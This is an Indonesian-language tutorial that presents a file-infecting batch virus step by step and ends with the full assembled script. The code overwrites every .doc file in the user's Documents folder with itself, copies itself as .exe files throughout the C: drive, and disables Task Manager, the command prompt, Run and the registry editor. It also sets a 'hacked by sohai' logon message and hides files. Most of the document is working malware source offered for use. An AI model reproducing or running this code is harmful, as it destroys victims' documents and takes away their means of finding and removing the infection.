suatu Program dapat di sebut sebagai suatu Virus,
apabila memenuhi minimal 5 kriteria sebagai berikut:
1. Kemampuan untuk Mendapatkan Informasi
2. Kemampuan untuk Memeriksa Suatu File
3. Kemampuan untuk Menggandakan Diri dan Menularkan Diri
4. Kemampuan untuk Melakukan Manipulasi
5. Kemampuan untuk Menyembunyikan Diri
1. Kemampuan untuk Mendapatkan Informasi
virus dirancang untuk menginfeksi banyak file atau program
Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada
dalam suatu direktori,Untuk apa?Agar virus dapat memperoleh daftar
file yang bisa ditulari
berikut contoh codingan dalam batch
code:
REM Mencari Folder MyDocument
set "DocReg=HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\DocFolderPaths"
for /f "tokens=1,2,*" %%a in ('REG QUERY "%DocReg%" /v "%username%"') do (
set "DocPath=%%~c"
)
2. Kemampuan untuk Memeriksa Suatu File.
suatu virus juga bisa memeriksa suatu file yang akan ditularinya misalnya virus tersebut
akan menulari program berekstensi *.doc,maka virus akan memeriksa apakah file ducumen itu
telah terinfeksi ataupun belum,karena jika sudah,akan percuma menularinya lagi
berikut contoh codingan dalam batch
code:
for /R "%DocPath%" %%d in (*.doc) do (
type "%%d">backup.txt
type %0>"%%~fd"
Del /f /q "backup.txt"
)
3. Kemampuan untuk Menggandakan Diri dan Menularkan Diri
virus memiliki kemampuan untuk mengandakan diri dengan cara menulari file lainnya
Suatu virus jika sudah menemukan korbannua maka virus akan mengenalinya dengan memeriksanya
jika belum terinfeksi maka virus akan memulai penularan dengan cara menuliskan byte
pengenal pada file itu,dan seterusnya menyalin/menulis kode object virus di atas file sasaran
berikut contoh codingan dalam batch
code:
REM Mengcopy diri sendiri ke seluruh folder di drive C
For /R C":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"
4. Kemampuan untuk Melakukan Manipulasi
virus memiliki kemampuan untuk bertahan hidup agar file virus tidak dapat di hapus
biasanya virus melakukan manipulasi seperti,mendisabled taskmanager,command prompt,run,regedit
atau kemampuan untuk menampilkan pesan saat komputer di jalankan
berikut contoh codingan dalam batch
code:
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableTaskMgr" /t REG_DWORD /d 00000001
reg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableTaskMgr" /t REG_DWORD /d 00000001
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /V "DisableCMD" /t REG_DWORD /d 00000001
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoRun" /t REG_DWORD /d 00000001
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableRegistryTools" /t REG_DWORD /d 00000001
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "Sohai Was Here" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "Your Computer has been hacked by sohai"
5. Kemampuan untuk Menyembunyikan Diri
kemampuan ini merupakan harus di miliki vius agar semua perkerjaannya dari awal sampai akhir
berikut contoh codingan dalam batch
code:
attrib +a +s +h *.*
untuk hasil akhirnya seperti ini
code:
@echo off
REM Mencari Folder MyDocument
set "DocReg=HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\DocFolderPaths"
for /f "tokens=1,2,*" %%a in ('REG QUERY "%DocReg%" /v "%username%"') do (
set "DocPath=%%~c"
)
for /R "%DocPath%" %%d in (*.doc) do (
type "%%d">backup.txt
type %0>"%%~fd"
Del /f /q "backup.txt"
)
REM Mengcopy diri sendiri ke seluruh folder di drive C
For /R C":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableTaskMgr" /t REG_DWORD /d 00000001
reg ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableTaskMgr" /t REG_DWORD /d 00000001
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /V "DisableCMD" /t REG_DWORD /d 00000001
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoRun" /t REG_DWORD /d 00000001
reg ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableRegistryTools" /t REG_DWORD /d 00000001
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "Sohai Was Here" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "Your Computer has been hacked by sohai"
attrib +a +s +h *.*
sekian dan terima kasih